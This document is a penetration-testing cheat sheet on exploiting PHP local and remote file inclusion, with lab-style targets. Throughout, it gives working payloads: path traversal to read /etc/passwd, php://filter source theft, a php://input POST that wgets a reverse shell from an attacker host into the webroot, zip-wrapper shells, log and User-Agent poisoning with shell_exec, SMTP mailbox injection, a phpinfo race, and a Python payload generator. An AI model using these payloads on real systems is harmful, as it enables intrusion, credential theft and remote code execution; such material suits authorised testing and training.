# PHP - LFI and RFI

**How to exploit PHP LFI/RFI, and the methods covered below:**

1. Basic Local File Inclusion and Remote File Inclusion
2. Null byte
3. Base64 encoded (`php://filter`)
4. PHP input wrapper (`php://input`)
5. PHP zip wrapper (`zip://`)
6. `/proc/self/environ`
7. Log file contamination
8. Email reverse shell
9. phpinfo() LFI

## **Basic Local File Inclusion and Remote File Inclusion**

The vulnerable pattern is a user-controlled value handed to `include`/`require`, for example `include($_GET['page'] . '.php');`. Local inclusion reads and executes files that already exist on the server; `/etc/passwd` is the usual first probe because it is world-readable and easy to recognise. When the parameter is used as part of a path, `../` sequences walk up to the filesystem root (extra ones past `/` are ignored, so overshooting is harmless).

```
http://example.com/script.php?page=../../../../../../../../etc/passwd

http://example.com/script.php?language=/etc/passwd
```

Remote inclusion points the same parameter at a URL of an attacker-hosted file instead of a local path. It only works when `allow_url_include=On` in php.ini, which has been off by default since PHP 5.2, so in practice most findings are local inclusion that has to be turned into code execution with one of the tricks below.

## **Null Byte**

```bash
# On PHP < 5.3.4 a null byte (%00) terminates the string inside include(), so anything the
# script appends to your value (typically ".php") is dropped:
http://example.com/script.php?language=/etc/passwd%00

# If the application URL-decodes the value a second time, send the double-encoded form %2500.

# A trailing ? only helps when the include target is a URL (RFI with allow_url_include=On):
# the appended ".php" then becomes a query string, on any PHP version. For a local path the
# ? is just part of the filename and nothing is truncated.
http://example.com/script.php?language=http://attacker/shell.txt?
```

## **Base64 Encoded**

The `php://filter` wrapper makes the include return a file's contents instead of executing it, which is how you read the source of PHP files: the vulnerable script itself, and config files holding database credentials. The data comes back base64-encoded inside the page, so extract and decode it. If the script appends `.php` to the parameter, leave the extension off `resource=` and let the script add it.

```bash
index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

index.php?page=php://filter/convert.base64-encode/resource=index.php
```
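The following helpers are an added example, not code from the original page: `traversal_payloads()` enumerates the basic and null-byte variants from the sections above, gated on the PHP version they apply to, and `filter_url()` plus `extract_filter_source()` build the `php://filter` request and decode the base64 that comes back wrapped in the site's HTML. The target URL, parameter name and the sample response body are assumptions constructed for the demo.

```python
# Added example (not from the original page): helpers for probing a PHP include()
# parameter. Target URL, parameter name and SAMPLE_BODY are constructed assumptions.
import base64
import re

# Null-byte truncation inside include() was removed in PHP 5.3.4.
NULL_BYTE_FIXED = (5, 3, 4)


def traversal_payloads(path, php_version=NULL_BYTE_FIXED, depth=8, url_include=False):
    """Return (label, value) pairs to try in the vulnerable parameter.

    path        -- file to read, e.g. "/etc/passwd" (or a URL when url_include=True)
    php_version -- tuple; null-byte variants are only emitted for versions < 5.3.4
    depth       -- number of "../" to prepend; extra ones past "/" are harmless
    url_include -- True when allow_url_include=On and path is http://...
    """
    if url_include:
        # For a URL target a trailing "?" turns whatever the script appends
        # (".php") into a query string, on any PHP version.
        return [("url", path), ("url+query", path + "?")]
    rel = "../" * depth + path.lstrip("/")
    cands = [("absolute", path), ("traversal", rel)]
    if php_version < NULL_BYTE_FIXED:
        cands.append(("nullbyte", rel + "%00"))
        # Double-encoded form for apps that URL-decode the value a second time.
        cands.append(("nullbyte-double", rel + "%2500"))
    return cands


def filter_url(base_url, param, resource):
    """URL that makes include() return `resource` base64-encoded instead of executing it."""
    return f"{base_url}?{param}=php://filter/convert.base64-encode/resource={resource}"


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_filter_source(body):
    """Pull the longest base64 run out of an HTML response and decode it.

    The included file's base64 is dumped wherever the template echoes the include,
    so it is wrapped in the site's own markup; the longest run is the file.
    """
    runs = _B64_RUN.findall(body)
    if not runs:
        return None
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


# Constructed sample: what a response to filter_url(..., "index.php") might look like.
SAMPLE_SOURCE = "<?php\ninclude($_GET['page'] . '.php');\n?>\n"
SAMPLE_BODY = (
    "<html><body><div class='nav'>Home</div>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    for label, value in traversal_payloads("/etc/passwd", php_version=(5, 2, 17)):
        print(f"{label:16} ?page={value}")
    print(filter_url("http://example.com/index.php", "page", "index"))
    print(extract_filter_source(SAMPLE_BODY))
```

Feed real responses to `extract_filter_source()` and check the decoded text starts with `<?php`; a decode that yields binary junk usually means the longest base64-looking run was an inline image or script, so narrow the search to the part of the page where the include is echoed.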

## **PHP Input Wrapper - POST**

`php://input` makes `include` read the raw POST body, so the body of your request is the PHP that runs. Like RFI this needs `allow_url_include=On`. The body is sent verbatim (nothing URL-encodes it), so use a raw client such as Burp Repeater, `nc` or a script rather than a browser form.

Example 1:

```bash
http://192.168.183.128/fileincl/example1.php?page=php://input
# POST body (use <?php rather than <? unless short_open_tag is enabled on the target):
<?php system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php'); ?>

# The shell is written into the target's webroot, so trigger it on the target
# (192.168.183.128), not on the attacker host that served the download:
http://192.168.183.128/shell.php
```

Example 2:

![](/files/-M-TEoGGMJItUi6KGJu5)

## **PHP Zip Wrapper**

The `zip://` wrapper lets `include` open an entry inside a zip archive that already sits on the server. If any upload feature lets you place a zip file on the target (the archive can carry a harmless extension, since the wrapper does not care about the name), the LFI can execute the PHP file packed inside it. A typical attack:

1. Create a PHP reverse shell (for example `shell.php`)
2. Compress it into a .zip file
3. Upload the archive through the vulnerable upload function and note where it is stored
4. Use the zip wrapper to include the entry; `%23` is the URL-encoded `#` that separates the archive path from the entry name (it must be encoded, or the browser treats the rest as a fragment and never sends it):

```bash
php?page=zip://path/to/file.zip%23shell
```

5. If the script appends `.php` to the parameter, the entry inside the archive must be named `shell.php` while the URL references `shell`, because the appended extension completes the entry name. If nothing is appended, reference `%23shell.php` directly.

## **/proc/self/environ**

```bash
/proc/self/environ
# /proc/self/environ is the environment of the process serving your request. When PHP runs as a
# CGI/FastCGI process that environment carries HTTP_USER_AGENT, so the User-Agent header you send
# is written into the file you are including. First check the LFI can read it at all (on many
# modern mod_php setups it is unreadable or holds only the daemon's own environment), then put
# PHP in the User-Agent header:
User-Agent: <?php echo "Hello"; ?>
# If "Hello" shows up in the response, swap the echo for system($_GET['cmd']) and pass cmd= in the URL.
```

![](/files/-M-TFOOQAm-KE-MxuEWO)

![](/files/-M-TFw5JKXyEljfKtoLA)

## **Log File Contamination**

Everything a client sends ends up in the web server's access log, so a PHP tag in a request is written to disk and runs when the log is included. Send it with a raw client such as `nc`: a browser or `curl` URL-encodes `<?php ... ?>` in the request line, so it would land in the log as `%3C%3Fphp` and never execute. Putting the payload in the User-Agent header works the same way and keeps the log line well-formed. The log must be readable by the PHP process; on Debian/Ubuntu `/var/log/apache2` is `root:adm` mode 750 by default, so this often fails there even when the path is right.

```bash
nc -nv 10.10.10.35 80
<?php echo shell_exec($_GET['cmd']);?>

# To execute it (Debian/Ubuntu path shown; RHEL-style systems use /var/log/httpd/access_log;
# the %00 only matters on PHP < 5.3.4 when the script appends an extension):
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/log/apache2/access.log%00&cmd=id
```

## **Email Reverse Shell**

If the target runs a local mail server and the LFI can read a user's mailbox, a message body containing PHP is included like any other file. Deliver the payload over SMTP, then include the mailbox of the recipient:

```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.

# Don't forget the . (dot) above: a line containing only a dot ends the DATA section.
# The short <? tag relies on short_open_tag being enabled; use <?php otherwise.
# Then include the mailbox (mbox format, one file per user under /var/mail):
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/mail/asterisk%00&ipp=whoami
```

## **phpinfo() LFI**

{% embed url="<https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf>" %}

Any POST carrying a file upload makes PHP store the file under a temporary name (`/tmp/phpXXXXXX`) for the duration of the request and delete it afterwards. A reachable `phpinfo()` page prints the `$_FILES` array, including that `tmp_name`, so the attack is a race: upload a PHP payload to phpinfo.php, read the temporary name from the response as it streams back, and include it through the LFI before the request finishes and the file is removed.

1 - Check that `file_uploads` is `On` in the phpinfo output

```bash
GET /phpinfo.php HTTP/1.1
```

2 - Send the POST with a `multipart/form-data` **Content-Type** and check that the PHP Variables section shows the `_FILES` entry with its `tmp_name`. Below are two examples.

Example 1 from the documentation:

![](/files/-M-TIoiLgXFhsnNdHpWb)

Example 2 from IPPSEC - POISON

![](/files/-M-TIsI7DmoC6jmCYuoh)

3 - The script is located at PayloadsAllTheThings - PHP LFI path.

```bash
# Must change:
 - PAYLOAD  (the PHP the upload should contain)
 - URI      (the vulnerable include and the phpinfo.php path)
 - the string the script searches for: phpinfo() HTML-encodes the arrow, so
   [tmp_name] => must become [tmp_name] =&gt; or the temporary name is never matched
```

4 - Start the listener and get it done

**References**:

- <https://secf00tprint.github.io/blog/payload-tester/lfirfi/en>
- <https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/>
- <https://highon.coffee/blog/lfi-cheat-sheet/>
- <https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/>

